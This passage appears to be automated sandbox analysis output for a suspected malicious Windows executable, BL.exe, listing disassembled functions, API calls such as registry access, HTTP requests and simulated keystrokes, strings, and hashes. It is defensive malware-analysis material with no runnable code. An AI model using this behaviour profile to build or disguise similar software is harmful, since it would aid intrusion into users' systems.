                                                                                                                            • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                            • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                                                                            Function 0045E912 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 353timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                                                                            • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                                                                            • VariantClear.OLEAUT32 ref: 0045E970
                                                                                                                            • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                                                                            • __swprintf.LIBCMT ref: 0045EB1F
                                                                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                                                                            Strings
                                                                                                                            • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                                                                            • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                            • API String ID: 43541914-1568723262
                                                                                                                            • Opcode ID: a91a6a11b3d6cf138c07060a726a6bd632cc840ea6057b3ca397e6bb9963c38f
                                                                                                                            • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                                                                            • Opcode Fuzzy Hash: a91a6a11b3d6cf138c07060a726a6bd632cc840ea6057b3ca397e6bb9963c38f
                                                                                                                            • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                                                                            Function 0042FE54 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 298sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DecrementInterlocked$Sleep
                                                                                                                            • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                                                                            • API String ID: 2250217261-3412429629
                                                                                                                            • Opcode ID: 8ee3dc3b90658de1bdba7935e7c509bae4c97cbbd898303c1487c3161a53cb39
                                                                                                                            • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                                                                            • Opcode Fuzzy Hash: 8ee3dc3b90658de1bdba7935e7c509bae4c97cbbd898303c1487c3161a53cb39
                                                                                                                            • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                                                                            Function 004689FF Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 288COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                            • API String ID: 0-1603158881
                                                                                                                            • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                            • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                                                                            • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                            • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                                                                            Function 00479C97 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 274COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00479D1F
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                                                              • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                                                              • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                                                              • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                                                                            • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                            • API String ID: 665237470-60002521
                                                                                                                            • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                            • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                                                            • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                            • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                                                            Function 00401D10 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 235COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                                                                            • DestroyWindow.USER32(?), ref: 0042A751
                                                                                                                            • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                            • String ID: close all$#v
                                                                                                                            • API String ID: 4174999648-3101823635
                                                                                                                            • Opcode ID: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                                                                            • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                                                                            • Opcode Fuzzy Hash: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                                                                            • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                                                                            Function 0046A75F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 179registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConnectRegistry_wcslen
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 535477410-2761332787
                                                                                                                            • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                            • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                                                                            • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                            • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                                                                            Function 0045F2C5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0045F317
                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                                                                            • IsMenu.USER32(?), ref: 0045F380
                                                                                                                            • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                                                                            • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                            • String ID: 0$2
                                                                                                                            • API String ID: 3311875123-3793063076
                                                                                                                            • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                            • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                                                                            • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                            • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                                                                            Function 0043717F Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\BL.exe), ref: 0043719E
                                                                                                                            • LoadStringW.USER32(00000000), ref: 004371A7
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                                                                            • LoadStringW.USER32(00000000), ref: 004371C0
                                                                                                                            • _printf.LIBCMT ref: 004371EC
                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\Desktop\BL.exe, xrefs: 00437189
                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleLoadModuleString$Message_printf
                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\BL.exe
                                                                                                                            • API String ID: 220974073-17324339
                                                                                                                            • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                            • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                                                                            • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                            • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                                                                            Function 00456168 Relevance: 13.7, APIs: 9, Instructions: 181COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                            • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                                                            • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                            • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                                                            Function 004534EB Relevance: 13.6, APIs: 9, Instructions: 150filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\BL.exe,?,C:\Users\user\Desktop\BL.exe,004A8E80,C:\Users\user\Desktop\BL.exe,0040F3D2), ref: 0040FFCA
                                                                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 978794511-0
                                                                                                                            • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                            • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                                                            • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                            • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                                                                            Function 004417BC Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                            • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                                                            • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                            • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                                                                            Function 00445CF9 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                                                              • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                                                              • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2014098862-0
                                                                                                                            • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                            • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                                                                            • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                            • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                                                                            Function 0045427D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 259libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc_malloc$_strcat_strlen
                                                                                                                            • String ID: AU3_FreeVar
                                                                                                                            • API String ID: 2184576858-771828931
                                                                                                                            • Opcode ID: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                                                            • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                                                            • Opcode Fuzzy Hash: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                                                            • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                                                            Function 0044AA1F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
